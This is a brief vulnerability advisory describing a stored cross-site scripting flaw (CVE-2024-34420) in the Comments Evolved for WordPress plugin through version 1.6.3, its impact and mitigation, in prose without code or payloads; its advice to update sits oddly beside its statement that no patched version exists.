CVE-2024-34420

The Comments Evolved for WordPress plugin, versions up to and including 1.6.3, fails to properly neutralize user input when generating web pages. This Improper Neutralization of Input During Web Page Generation, known as Cross-site Scripting (XSS), allows an attacker to inject arbitrary scripts that are stored on the server and later executed in the browser of any visitor viewing the affected page [1].

The vulnerability is classified as Stored XSS, which means the injected payload persists in the database and is served to users without requiring further interaction from the attacker. Exploitation requires a privileged user (e.g., an administrator) to perform an action such as clicking a malicious link or submitting a crafted form, but once triggered, the injected script executes for all subsequent visitors [1].

A successful attack enables the malicious actor to inject scripts that can perform various actions, such as redirecting users to malicious sites, displaying unwanted advertisements, or stealing sensitive data. This type of vulnerability is commonly used in mass-exploit campaigns targeting thousands of websites regardless of their size or popularity [1].

As an immediate mitigation, users are advised to update the plugin to the latest available version. If updating is not possible, site owners should seek assistance from their hosting provider or web developer. The vendor has not yet released a patched version, and the plugin remains affected in its current state [1].